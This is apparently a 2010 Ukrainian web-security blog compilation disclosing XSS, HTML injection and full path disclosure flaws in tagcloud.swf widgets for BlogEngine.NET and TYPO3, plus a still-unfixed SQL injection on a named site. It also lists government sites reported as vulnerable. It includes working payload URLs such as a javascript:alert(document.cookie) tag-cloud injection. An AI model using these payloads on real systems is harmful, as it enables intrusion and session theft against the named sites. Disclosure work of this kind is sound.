Цікаве чтиво на тему web security
22:48 11.05.2010Продовжуючи традицію, пропоную вашій увазі цікаві секюріті статті. Щоб ви поповнювали свої знання з веб безпеки.
Добірка цікавого чтива на тему web security (статті з Вікіпедії):
Продовжуючи традицію, пропоную вашій увазі цікаві секюріті статті. Щоб ви поповнювали свої знання з веб безпеки.
Добірка цікавого чтива на тему web security (статті з Вікіпедії):
Виявлена можливість проведення DoS атаки проти PostgreSQL.
Уразливі версії: PostgreSQL 8.3.
Відмова через функцію substring() у SQL.
В даній добірці уразливості в веб додатках:
Раніше я вже писав про уразливості в t3m_cumulus_tagcloud для TYPO3. Така ж XSS уразливість є й у віджеті Cumulus для BlogEngine.NET, що використовує tagcloud.swf розроблений автором WP-Cumulus. Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах.
У квітні, 30.04.2010, я знайшов Cross-Site Scripting уразливість у віджеті Cumulus для BlogEngine.NET. Дірку виявив на сайті http://planning.maryland.gov. Про що найближчим часом повідомлю розробникам.
XSS:
http://site/Blog/widgets/Cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
Код виконається при кліку. Це Strictly social XSS.
Також можна провести HTML Injection атаку, в тому числі на ті флешки, де заборонені (у флешках чи через WAF) javascript та vbscript URI в параметрі tagcloud.
HTML Injection:
http://site/Blog/widgets/Cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
Уразливі всі версії Cumulus для BlogEngine.NET.
Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.
Як і у випадку з іншими веб сайтами, інфікований сайт yur-gazeta.com також хостить в себе Укртелеком.
Як я вже розповідав, я прийняв участь у проекті Vulnerable Sites Database. І до раніше відправлених їм дірявих сайтів, я вже відправив нові.
Нещодавно я відправив в БД даного проекту 15 сайтів. З них 10 старих дірявих сайтів, про які я вже писав в новинах раніше, та 5 нових уразливих сайтів.
Це діряві gov-сайти: cityofcalapan.gov.ph, www.iea.cyf.gov.pl, www.metinsabancishcek.gov.tr, www.tuzlaram.gov.tr, www.cayirovamuftulugu.gov.tr.
22.10.2009
У лютому, 16.02.2009, я знайшов SQL Injection, Full path disclosure та SQL DB Structure Extaction уразливості на сайті http://referat.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
10.05.2010
SQL Injection:
http://referat.com.ua/referat_show.php?id=’%20or%20version()%3E4/*
Full path disclosure:
http://referat.com.ua/referat_show.php?id=’
SQL DB Structure Extaction:
http://referat.com.ua/referat_show.php?id=’
Дані уразливості досі не виправлені.
Раніше я вже писав про уразливість в Tagcloud для DLE. Така ж уразливість є і в плагіні t3m_cumulus_tagcloud для TYPO3, що використовує tagcloud.swf розроблений автором WP-Cumulus. Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах.
Вчора, 30.04.2010, я знайшов Cross-Site Scripting та Full path disclosure уразливості в плагіні t3m_cumulus_tagcloud для TYPO3. Уразливості виявив на сайті http://www.hospitalgranada.gov.co. Про що найближчим часом повідомлю розробникам.
XSS:
http://site/typo3conf/ext/t3m_cumulus_tagcloud/pi1/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
Код виконається при кліку. Це Strictly social XSS.
Також можна провести HTML Injection атаку, в тому числі на ті флешки, де заборонені (у флешках чи через WAF) javascript та vbscript URI в параметрі tagcloud.
HTML Injection:
http://site/typo3conf/ext/t3m_cumulus_tagcloud/pi1/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
Full path disclosure:
http://site/typo3conf/ext/t3m_cumulus_tagcloud/pi1/class.tx_t3mcumulustagcloud_pi1.php
Уразлива версія t3m_cumulus_tagcloud 1.0.
Як я вже розповідав, я прийняв участь у проекті Vulnerable Sites Database. І до раніше відправлених їм дірявих сайтів, я вже відправив нові.
Нещодавно я відправив в БД даного проекту 15 сайтів. З них 5 старих дірявих сайтів, про які я вже писав в новинах раніше, та 10 нових уразливих сайтів.
Це діряві gov-сайти: www.vargemgrandepta.sp.gov.br, www.iga.gov.ba, www.crc.gov.gh, noticias.chubut.gov.ar, www.tribunalconstitucional.gov.bo, www.uesp.gov.co, escuelaslibres.mcye.misiones.gov.ar, www.guayaquil.gov.ec, www.hospitalgranada.gov.co, planning.maryland.gov.
Виявлена можливість обходу аутентифікації mod_auth_shadow в Apache.
Уразливі версії: Apache mod_auth_shadow 2.2.
Короткочасні умови дозволяють доступ без перевірки імені користувача і пароля.